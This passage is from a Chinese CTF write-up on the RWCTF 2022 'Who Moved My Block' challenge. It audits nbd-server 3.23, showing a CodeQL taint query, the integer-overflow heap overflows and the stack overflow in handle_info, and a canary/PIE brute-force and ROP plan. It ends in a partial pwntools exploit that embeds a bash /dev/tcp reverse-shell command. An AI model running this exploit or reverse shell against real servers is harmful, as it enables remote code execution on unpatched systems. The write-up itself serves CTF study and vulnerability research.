GOT 表的相对偏移位置。</li><li>第二次执行：读取 <code>/proc/self/maps</code>：<ul><li>获取远程机器 python 程序的基地址，加上 GOT 相对偏移得到 GOT 表的绝对地址。</li><li>获取远程机器上 python 程序的可执行代码段地址，将 shellcode 写入可执行代码段中。</li><li>修改 GOT 表上的条目入口为 shellcode ，之后尝试触发所被修改 GOT 表的函数，使 python 执行 shellcode。</li></ul></li></ul><blockquote><p>这题利用较为简单，exp 鸽了。</p></blockquote><h2 id="三、Who-Moved-My-Block">三、Who Moved My Block</h2><h3 id="1-wmmb-小叙">1. wmmb 小叙</h3><figure class="highlight text"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">On Linux, network block device (NBD) is a network protocol that can be used to forward a block device (typically a hard disk or partition) from one machine to a second machine. As an example, a local machine can access a hard disk drive that is attached to another computer.</span><br><span class="line">https://github.com/NetworkBlockDevice/nbd</span><br><span class="line">nc 47.242.113.232 31337</span><br><span class="line">attachment</span><br><span class="line"></span><br><span class="line">Clone-and-Pwn, difficulty:baby</span><br></pre></td></tr></table></figure><h3 id="2-wmmb-环境搭建">2. wmmb 环境搭建</h3><p>查看题目提供的二进制开启的保护（好家伙，真就全开）：</p><p><img src="/2022/01/rwctf2022_qws/image-20220125115931741.png" alt="image-20220125115931741"></p><p>下拉源码编译，</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">wget https://versaweb.dl.sourceforge.net/project/nbd/nbd/3.23/nbd-3.23.tar.gz</span><br><span class="line">tar -xvf nbd-3.23.tar.gz</span><br><span class="line"><span class="built_in">cd</span> nbd-3.23</span><br><span class="line">./configure --enable-debug</span><br><span class="line"><span class="comment"># 编译时启用 Full RELRO、Canary、NX 和 PIE</span></span><br><span class="line">make <span class="string">&quot;CFLAGS += -fstack-protector-all -pie -z now -z noexecstack&quot;</span></span><br><span class="line"><span class="comment"># make install</span></span><br><span class="line"></span><br><span class="line">./nbd-server 0.0.0.0:10809 <span class="variable">$&#123;PWD&#125;</span>/../WhoMovedMyBlock/container/rootfs.ext2</span><br><span class="line"><span class="comment"># 注意，直接执行 nbd-server 会在输出信息后，**前台进程** 立即转为后台进程，移交控制权给 shell</span></span><br><span class="line"><span class="comment"># 该进程仍然在后台执行，可以使用以下命令探查到</span></span><br><span class="line">ps -ax | grep <span class="string">&quot;nbd&quot;</span></span><br></pre></td></tr></table></figure><p><img src="/2022/01/rwctf2022_qws/image-20220124222106716.png" alt="image-20220124222106716"></p><blockquote><p>调试时，如果不希望让该进程转为后台进程，则 make 时添加 flag：<code>make &quot;CFLAGS += -DNODAEMON&quot;</code></p></blockquote><h3 id="3-漏洞点-2">3. 漏洞点</h3><h4 id="a-漏洞寻找">a. 漏洞寻找</h4><p>远程机器上会架起一个 nbd-server，很明显我们需要向这个 nbd-server 发起一个连接，并尝试在发送的 payload 中构造一些恶意的字段。</p><p>那么我们就需要尝试去审计代码（代码位于 <code>nbd-3.23/nbd-server.c</code>），找到一条<strong>不受信任输入 -&gt; 无过滤 -&gt; 访问内存</strong>这样的一条途径。</p><p>那就首先从 <code>accept</code> 函数开始找起，它是整个 socket 连接的起点，通过它我们可以根据交叉引用找到处理连接的函数 <code>handle_modern_connection</code>：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">void</span></span></span><br><span class="line"><span class="function"><span class="title">handle_modern_connection</span><span class="params">(GArray *<span class="type">const</span> servers, <span class="type">const</span> <span class="type">int</span> sock, <span class="keyword">struct</span> generic_conf *genconf)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    [...]</span><br><span class="line">    net = <span class="built_in">socket_accept</span>(sock);</span><br><span class="line">    <span class="keyword">if</span> (net &lt; <span class="number">0</span>)</span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">if</span> (!dontfork) &#123;</span><br><span class="line">        <span class="comment">// 重要！：注意这里会 fork 出一个子进程来单独处理新连接</span></span><br><span class="line">        pid = <span class="built_in">spawn_child</span>(&amp;commsocket);</span><br><span class="line">        <span class="keyword">if</span> (pid) &#123;</span><br><span class="line">            <span class="keyword">if</span> (pid &gt; <span class="number">0</span>) &#123;</span><br><span class="line">                <span class="built_in">msg</span>(LOG_INFO, <span class="string">&quot;Spawned a child process&quot;</span>);</span><br><span class="line">                <span class="built_in">g_array_append_val</span>(childsocks, commsocket);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">if</span> (pid &lt; <span class="number">0</span>)</span><br><span class="line">                <span class="built_in">msg</span>(LOG_ERR, <span class="string">&quot;Failed to spawn a child process&quot;</span>);</span><br><span class="line">            <span class="built_in">close</span>(net);</span><br><span class="line">            <span class="keyword">return</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">/* Child just continues. */</span></span><br><span class="line">    &#125;</span><br><span class="line">    [...]</span><br><span class="line">    </span><br><span class="line">    <span class="comment">// 连接协商</span></span><br><span class="line">    client = <span class="built_in">negotiate</span>(net, servers, genconf);</span><br><span class="line">       </span><br><span class="line">    [...]</span><br><span class="line">       </span><br><span class="line">    <span class="built_in">msg</span>(LOG_INFO, <span class="string">&quot;Starting to serve&quot;</span>);</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 开始处理</span></span><br><span class="line">    <span class="built_in">mainloop_threaded</span>(client);</span><br><span class="line">    <span class="built_in">exit</span>(EXIT_SUCCESS);</span><br><span class="line">handler_err:</span><br><span class="line">    [...]</span><br><span class="line">&#125;</span><br><span class="line">        </span><br></pre></td></tr></table></figure><p>需要注意的是，默认情况下对于每个连接，server 都会 fork 一个新的子进程来单独处理。这个特性相当重要，因为我们可以利用这个特性来<strong>爆破 canary 和 PIE</strong>。</p><p><img src="/2022/01/rwctf2022_qws/image-20220125123033017.png" alt="image-20220125123033017"></p><p>该函数会调用 <code>negotiate</code> 函数，并创建结构体 <code>CLIENT</code>，将新连接的 fd 赋给该 client，之后后续使用 <code>socket_read(client, addr, len)</code> 来从 client（即我们这边）读取数据。</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">/**</span></span><br><span class="line"><span class="comment"> * Do the initial negotiation.</span></span><br><span class="line"><span class="comment"> *</span></span><br><span class="line"><span class="comment"> * @param net The socket we&#x27;re doing the negotiation over.</span></span><br><span class="line"><span class="comment"> * @param servers The array of known servers.</span></span><br><span class="line"><span class="comment"> * @param genconf the global options (needed for accessing TLS config data)</span></span><br><span class="line"><span class="comment"> **/</span></span><br><span class="line"><span class="function">CLIENT* <span class="title">negotiate</span><span class="params">(<span class="type">int</span> net, GArray* servers, <span class="keyword">struct</span> generic_conf *genconf)</span> </span>&#123;</span><br><span class="line">    <span class="type">uint16_t</span> smallflags = NBD_FLAG_FIXED_NEWSTYLE | NBD_FLAG_NO_ZEROES;</span><br><span class="line">    <span class="type">uint64_t</span> magic;</span><br><span class="line">    <span class="type">uint32_t</span> cflags = <span class="number">0</span>;</span><br><span class="line">    <span class="type">uint32_t</span> opt;</span><br><span class="line">    <span class="comment">// 创建并初始化 client 结构体</span></span><br><span class="line">    CLIENT* client = <span class="built_in">g_new0</span>(CLIENT, <span class="number">1</span>);</span><br><span class="line">    <span class="comment">// 将 socket fd 赋给 cleint</span></span><br><span class="line">    client-&gt;net = net;</span><br><span class="line">    client-&gt;socket_read = socket_read_notls;</span><br><span class="line">    client-&gt;socket_write = socket_write_notls;</span><br><span class="line">    client-&gt;socket_closed = socket_closed_negotiate;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">assert</span>(servers != <span class="literal">NULL</span>);</span><br><span class="line">    <span class="built_in">socket_write</span>(client, INIT_PASSWD, <span class="number">8</span>);</span><br><span class="line">    magic = <span class="built_in">htonll</span>(opts_magic);</span><br><span class="line">    <span class="built_in">socket_write</span>(client, &amp;magic, <span class="built_in">sizeof</span>(magic));</span><br><span class="line"></span><br><span class="line">    smallflags = <span class="built_in">htons</span>(smallflags);</span><br><span class="line">    <span class="built_in">socket_write</span>(client, &amp;smallflags, <span class="built_in">sizeof</span>(<span class="type">uint16_t</span>));</span><br><span class="line">    <span class="comment">// 从 client 读取数据</span></span><br><span class="line">    <span class="built_in">socket_read</span>(client, &amp;cflags, <span class="built_in">sizeof</span>(cflags));</span><br><span class="line">    cflags = <span class="built_in">htonl</span>(cflags);</span><br><span class="line">    [...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>这样，我们可以全局搜索 <code>socket_read</code>的使用并对其进行审计。该函数使用的次数不多，只有不到 20次，因此人工审计还是很快的。通过审计可以找到3个漏洞点。</p><blockquote><p>注意，审计时忽略了 TLS 相关的函数，因为远程不启用 TLS 交互。</p></blockquote><h4 id="b-漏洞">b. 漏洞</h4><h5 id="0-codeql">0) codeql</h5><blockquote><p>author: sakura.</p></blockquote><p>顺手写了一下codeql的数据流分析，这里考虑两种简单写法，一种是将网络端序转换的函数例如htol作为source，然后<code>socket_read</code>作为sink点检查size溢出。</p><p>另一种是将<code>socket_read</code>的第二个参数，这个接收用户输入的地方作为source点，然后将看能否污点到binary operation或者污点到<code>source_read</code>的第三个参数。</p><p>这里写了下后者的QL。</p><p>在写codeql的时候注意到QL的数据流分析其实是比较保守的，所以需要自己去连接一些边。</p><p><img src="https://sakura-1252236262.cos.ap-beijing.myqcloud.com/2022-01-26-074540.png" alt="sakuraimg"></p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br></pre></td><td class="code"><pre><span class="line">/**</span><br><span class="line"> * @kind path-problem</span><br><span class="line"> */</span><br><span class="line"></span><br><span class="line">import DataFlow::PathGraph</span><br><span class="line">import cpp</span><br><span class="line">import semmle.code.cpp.ir.dataflow.TaintTracking</span><br><span class="line"></span><br><span class="line">predicate htonlCallEdge(DataFlow::Node node1, DataFlow::Node node2) &#123;</span><br><span class="line">  exists(FunctionCall fc |</span><br><span class="line">    // fc.getTarget().getName() = &quot;htonl&quot; and</span><br><span class="line">    node1.asExpr() = fc.getAnArgument() and</span><br><span class="line">    node2.asExpr() = fc</span><br><span class="line">  )</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">class MyDataFlowConfiguration extends TaintTracking::Configuration &#123;</span><br><span class="line">  MyDataFlowConfiguration() &#123; this = &quot;MyDataFlowConfiguration&quot; &#125;</span><br><span class="line"></span><br><span class="line">  override predicate isSource(DataFlow::Node source) &#123;</span><br><span class="line">    exists(FunctionCall fc | fc.getArgument(1) = source.asExpr() |</span><br><span class="line">      fc.getTarget().hasGlobalName(&quot;socket_read&quot;)</span><br><span class="line">    )</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  override predicate isSink(DataFlow::Node sink) &#123;</span><br><span class="line">    sink.asExpr().getLocation().toString().matches(&quot;%nbd-server%&quot;) and</span><br><span class="line">    sink.asExpr() instanceof BinaryArithmeticOperation</span><br><span class="line">    // exists(FunctionCall fc | fc.getArgument(2) = sink.asExpr() |</span><br><span class="line">    //   fc.getTarget().hasGlobalName(&quot;socket_read&quot;)</span><br><span class="line">    // )</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  override predicate isAdditionalTaintStep(DataFlow::Node node1, DataFlow::Node node2) &#123;</span><br><span class="line">    htonlCallEdge(node1, node2)</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line">from MyDataFlowConfiguration config, DataFlow::PathNode source, DataFlow::PathNode sink</span><br><span class="line">where config.hasFlowPath(source, sink)</span><br><span class="line">select sink.getNode(), source, sink, &quot;&quot;</span><br></pre></td></tr></table></figure><h5 id="1-handle-export-name">1) handle_export_name</h5><p>一个<strong>整数溢出</strong>所造成的<strong>堆溢出漏洞点</strong>位于 <code>handle_export_name</code> 函数中：</p><blockquote><p>可以造成任意长度的堆溢出。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> CLIENT* <span class="title">handle_export_name</span><span class="params">(CLIENT* client, <span class="type">uint32_t</span> opt, GArray* servers, <span class="type">uint32_t</span> cflags)</span> </span>&#123;</span><br><span class="line">    <span class="type">uint32_t</span> namelen;</span><br><span class="line">    <span class="type">char</span>* name;</span><br><span class="line">    <span class="type">int</span> i;</span><br><span class="line">    <span class="comment">// 从 client 读入 namelen</span></span><br><span class="line">    <span class="built_in">socket_read</span>(client, &amp;namelen, <span class="built_in">sizeof</span>(namelen));</span><br><span class="line">    namelen = <span class="built_in">ntohl</span>(namelen);</span><br><span class="line">    <span class="keyword">if</span>(namelen &gt; <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="comment">// 这里没有做整数溢出判断，因此如果 namelen 为 0xffffffff，那么实际 malloc 的 size 为 0</span></span><br><span class="line">        <span class="comment">// 因此这里会造成堆溢出</span></span><br><span class="line">        name = <span class="built_in">malloc</span>(namelen<span class="number">+1</span>);</span><br><span class="line">        name[namelen]=<span class="number">0</span>;</span><br><span class="line">        <span class="built_in">socket_read</span>(client, name, namelen);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        name = <span class="built_in">strdup</span>(<span class="string">&quot;&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    [...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h5 id="2-handle-info">2) handle_info</h5><p>该函数中有两个漏洞点，其中一个还是和上面类似的<strong>堆溢出</strong>：</p><blockquote><p>还是可以造成任意长度的堆溢出。</p></blockquote><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">bool</span> <span class="title">handle_info</span><span class="params">(CLIENT* client, <span class="type">uint32_t</span> opt, GArray* servers, <span class="type">uint32_t</span> cflags)</span> </span>&#123;</span><br><span class="line">    <span class="type">uint32_t</span> namelen, len;</span><br><span class="line">    <span class="type">char</span> *name;</span><br><span class="line">    <span class="type">int</span> i;</span><br><span class="line">    SERVER *server = <span class="literal">NULL</span>;</span><br><span class="line">    [...]</span><br><span class="line">    <span class="type">char</span> buf[<span class="number">1024</span>];</span><br><span class="line">    [...]</span><br><span class="line"></span><br><span class="line">    <span class="built_in">socket_read</span>(client, &amp;len, <span class="built_in">sizeof</span>(len));</span><br><span class="line">    len = <span class="built_in">htonl</span>(len);</span><br><span class="line">    <span class="comment">// 1. 从远程读入 namelen</span></span><br><span class="line">    <span class="built_in">socket_read</span>(client, &amp;namelen, <span class="built_in">sizeof</span>(namelen));</span><br><span class="line">    namelen = <span class="built_in">htonl</span>(namelen);</span><br><span class="line">    <span class="keyword">if</span>(namelen &gt; (len - <span class="number">6</span>)) &#123;</span><br><span class="line">        <span class="built_in">send_reply</span>(client, opt, NBD_REP_ERR_INVALID, <span class="number">-1</span>, <span class="string">&quot;An OPT_INFO request cannot be smaller than the length of the name + 6&quot;</span>);</span><br><span class="line">        <span class="built_in">socket_read</span>(client, buf, len - <span class="built_in">sizeof</span>(namelen));</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(namelen &gt; <span class="number">0</span>) &#123;</span><br><span class="line">        <span class="comment">// 2. 没有判断便直接加1，执行 malloc(0) 造成堆溢出</span></span><br><span class="line">        name = <span class="built_in">malloc</span>(namelen + <span class="number">1</span>);</span><br><span class="line">        <span class="comment">// *. 缺点，需要做风水绕过 0xffffffff 的越界写，因为这里可能会造成 SIGSEGV。</span></span><br><span class="line">        name[namelen] = <span class="number">0</span>;</span><br><span class="line">        <span class="built_in">socket_read</span>(client, name, namelen);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        name = <span class="built_in">strdup</span>(<span class="string">&quot;&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    [...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>还有一个是<strong>溢出长度不受限的栈溢出</strong>：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="type">static</span> <span class="type">bool</span> <span class="title">handle_info</span><span class="params">(CLIENT* client, <span class="type">uint32_t</span> opt, GArray* servers, <span class="type">uint32_t</span> cflags)</span> </span>&#123;</span><br><span class="line">    <span class="type">uint32_t</span> namelen, len;</span><br><span class="line">    <span class="type">char</span> *name;</span><br><span class="line">    <span class="type">int</span> i;</span><br><span class="line">    SERVER *server = <span class="literal">NULL</span>;</span><br><span class="line">    [...]</span><br><span class="line">    <span class="type">char</span> buf[<span class="number">1024</span>];</span><br><span class="line">    [...]</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 1. 从远程读入 len</span></span><br><span class="line">    <span class="built_in">socket_read</span>(client, &amp;len, <span class="built_in">sizeof</span>(len));</span><br><span class="line">    len = <span class="built_in">htonl</span>(len);</span><br><span class="line">    <span class="comment">// 2. 从远程读入 namelen</span></span><br><span class="line">    <span class="built_in">socket_read</span>(client, &amp;namelen, <span class="built_in">sizeof</span>(namelen));</span><br><span class="line">    namelen = <span class="built_in">htonl</span>(namelen);</span><br><span class="line">    <span class="comment">// 3. 进入 if 分支</span></span><br><span class="line">    <span class="keyword">if</span>(namelen &gt; (len - <span class="number">6</span>)) &#123;</span><br><span class="line">        <span class="built_in">send_reply</span>(client, opt, NBD_REP_ERR_INVALID, <span class="number">-1</span>, <span class="string">&quot;An OPT_INFO request cannot be smaller than the length of the name + 6&quot;</span>);</span><br><span class="line">        <span class="comment">// 4. 从 client 读入数据，由于 len 可控，因此可以造成栈溢出</span></span><br><span class="line">        <span class="built_in">socket_read</span>(client, buf, len - <span class="built_in">sizeof</span>(namelen));</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">if</span>(namelen &gt; <span class="number">0</span>) &#123;</span><br><span class="line">        name = <span class="built_in">malloc</span>(namelen + <span class="number">1</span>);</span><br><span class="line">        name[namelen] = <span class="number">0</span>;</span><br><span class="line">        <span class="built_in">socket_read</span>(client, name, namelen);</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        name = <span class="built_in">strdup</span>(<span class="string">&quot;&quot;</span>);</span><br><span class="line">    &#125;</span><br><span class="line">    [...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="4-利用流程-2">4. 利用流程</h3><ul><li><p>首先，连接远程，并手动构造恶意数据字段，触发栈溢出，爆破出 Canary 和 PIE，进而计算出$addr_{ELF-base}、addr_{GOT}、addr_{system}、addr_{gadgets}$等等。</p></li><li><p>leak 出这些后，我们需要将待执行的 cmd 传递给 system 函数。但我们发来的所有数据都存储在 heap 中，cmd 自然也不例外，因此我们还需要 leak 出堆地址。</p><p>注意到 <code>handle_info</code> 函数栈上存放了一个 old r12 数据，指向 client，我们可以试着爆破这个栈上数据来获取堆地址。</p><blockquote><p>需要注意的是，连接远程时是使用 socket 进行通信，因此 cmd 不能是直接的 <code>cat /flag</code>，必须将所执行命令的 stdout 导入到我们连接的 socket fd 上。</p><p>最简单的方式就是<strong>反弹 shell</strong>至我们的主机上。</p></blockquote></li><li><p>最后使用 ROP 一把梭。</p></li></ul><h3 id="5-Exploit">5. Exploit</h3><p>这题 exploit 有点意思，所以本人试着自己动手写了下：</p><blockquote><p>注意，exp 中的偏移量等使用的是自编译的 nbd-server。</p><p>由于本人根据远程的保护，在编译时对等开启了相应的保护，因此实际上编译出的 nbd-server 和远程的 binary，其内部偏移几乎无差别，因此该 exp 只需简单改改部分偏移量即可解远程 binary。</p></blockquote><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br><span class="line">81</span><br><span class="line">82</span><br><span class="line">83</span><br><span class="line">84</span><br><span class="line">85</span><br><span class="line">86</span><br><span class="line">87</span><br><span class="line">88</span><br><span class="line">89</span><br><span class="line">90</span><br><span class="line">91</span><br><span class="line">92</span><br><span class="line">93</span><br><span class="line">94</span><br><span class="line">95</span><br><span class="line">96</span><br><span class="line">97</span><br><span class="line">98</span><br><span class="line">99</span><br><span class="line">100</span><br><span class="line">101</span><br><span class="line">102</span><br><span class="line">103</span><br><span class="line">104</span><br><span class="line">105</span><br><span class="line">106</span><br><span class="line">107</span><br><span class="line">108</span><br><span class="line">109</span><br><span class="line">110</span><br><span class="line">111</span><br><span class="line">112</span><br><span class="line">113</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#! python3</span></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">context(</span><br><span class="line">    terminal=[<span class="string">&#x27;gnome-terminal&#x27;</span>, <span class="string">&#x27;-x&#x27;</span>, <span class="string">&#x27;bash&#x27;</span>, <span class="string">&#x27;-c&#x27;</span>],</span><br><span class="line">    os=<span class="string">&#x27;linux&#x27;</span>,</span><br><span class="line">    arch=<span class="string">&#x27;amd64&#x27;</span>,</span><br><span class="line">    encoding=<span class="string">&#x27;latin&#x27;</span>,</span><br><span class="line">    endian=<span class="string">&quot;little&quot;</span>,       <span class="comment"># 注意：网络端序是大端序</span></span><br><span class="line">    log_level=<span class="string">&quot;info&quot;</span>,</span><br><span class="line">)</span><br><span class="line"></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">stack layout:</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">- 0x400 bytes buf</span></span><br><span class="line"><span class="string">- 8 bytes unknown field</span></span><br><span class="line"><span class="string">- canary</span></span><br><span class="line"><span class="string">- 8 bytes unknown field</span></span><br><span class="line"><span class="string">- old_rbx</span></span><br><span class="line"><span class="string">- old_rbp</span></span><br><span class="line"><span class="string">- old_r12 : client_addr</span></span><br><span class="line"><span class="string">- old_r13</span></span><br><span class="line"><span class="string">- old_r14</span></span><br><span class="line"><span class="string">- old_r15</span></span><br><span class="line"><span class="string">- return addr</span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">send_new_request</span>(<span class="params">payload</span>):</span><br><span class="line">    p = remote(<span class="string">&quot;127.0.0.1&quot;</span>, <span class="number">10809</span>)</span><br><span class="line">    cmd = <span class="string">b&#x27; &#x27;</span>*<span class="number">0x25</span> + <span class="string">b&quot;sleep 5; bash -c \&quot;bash -i &gt;&amp; /dev/tcp/127.0.0.1/8001 0&gt;&amp;1\&quot;&quot;</span></span><br><span class="line">    </span><br><span class="line">    p.send(p32(<span class="number">0</span>, endian=<span class="string">&quot;big&quot;</span>))                  <span class="comment"># cflags</span></span><br><span class="line">    p.send(<span class="string">b&quot;IHAVEOPT&quot;</span>)                           <span class="comment"># opt_magic</span></span><br><span class="line">    p.send(p32(<span class="number">7</span>, endian=<span class="string">&quot;big&quot;</span>))                  <span class="comment"># opt: NBD_OPT_GO</span></span><br><span class="line">    p.send(p32(<span class="built_in">len</span>(payload) + <span class="number">4</span>, endian=<span class="string">&quot;big&quot;</span>))   <span class="comment"># len</span></span><br><span class="line"></span><br><span class="line">    namelen = <span class="built_in">len</span>(payload)</span><br><span class="line">    p.send(p32(namelen, endian=<span class="string">&quot;big&quot;</span>))            <span class="comment"># namelen (&gt; (len - 6))</span></span><br><span class="line">    </span><br><span class="line">    p.send(payload)                               <span class="comment"># payload</span></span><br><span class="line"></span><br><span class="line">    padding_len = namelen - <span class="built_in">len</span>(cmd)</span><br><span class="line">    <span class="keyword">assert</span> padding_len &gt;= <span class="number">0</span></span><br><span class="line">    